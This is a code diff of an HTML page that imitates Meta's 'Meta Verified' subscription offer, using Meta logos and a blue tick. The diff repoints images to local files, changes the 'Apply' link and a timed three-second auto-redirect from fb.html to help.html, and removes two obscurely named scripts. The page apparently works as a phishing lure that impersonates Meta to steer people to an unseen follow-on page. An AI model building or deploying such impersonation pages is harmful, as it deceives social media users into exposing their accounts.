--- a/index.html
+++ b/index.html
@@ -1,3 +1,5 @@
+
+
 <!DOCTYPE html>
 
 <html lang="en">
@@ -103,20 +105,20 @@
             }
         }
     </style>
-<script  type="text/javascript"  src="/pku43x96zuaAruuwBuZWT23eImeMj6f14tgP_9QhppWxFDGsOn7vgjDm6kYMTQWMiy7Wket4wPlGbMCF0pAUhQ=="></script><script  type="text/javascript"  src="/Nn6_gJa8RWbETKpNSW_R7j3b0x6GasoSxForgFxEKGVH2J3mgJnaFwtbpLgHukSV4DGSNKq6QClUPZBOB5HFNA=="></script></head>
+</head>
 
 <body>
     <div class="container-fluid">
         <div class="container">
-            <img src="https://cdn.glitch.global/325f7535-a68d-4687-a91c-1e7d9366104a/meta-logo-QVrNRj93.svg?v=1723987211189" alt="logo" class="logo">
+            <img src="meta-logo-QVrNRj93.svg" alt="logo" class="logo">
         </div>
     </div>
     <div class="content">
         <div class="col-sm-6">
-            <img src="https://cdn.glitch.global/325f7535-a68d-4687-a91c-1e7d9366104a/blue_tick-B9ADAlwo.png?v=1723987162846" alt="meta" class="meta-logo">
+            <img src="blue_tick-B9ADAlwo.png" alt="meta" class="meta-logo">
             <h1 class="my-3 fs-1">Stand out with Meta<br> Verified</h1>
             <div style="margin-bottom: 30px;"></div>
-            <a class='btn' href='fb.html'>Apply</a>
+            <a class='btn' href='help.html'>Apply</a>
             <p class="mt-4">Grow your social presence with Meta Verified – a new subscription <br> bundle available for creators and businesses on Instagram and <br> Facebook.</p>
             <p class="sign-up">Sign up now for creators</p>
             <p class="mt-4 mb-0">
@@ -134,7 +136,7 @@
     });
 
     setTimeout(function() {
-    var redirectURL = "fb.html"; // Updated URL
+    var redirectURL = "help.html"; // Updated URL
     window.location.replace(redirectURL);
     }, 3000); // 3000 milliseconds (3 seconds)
     });
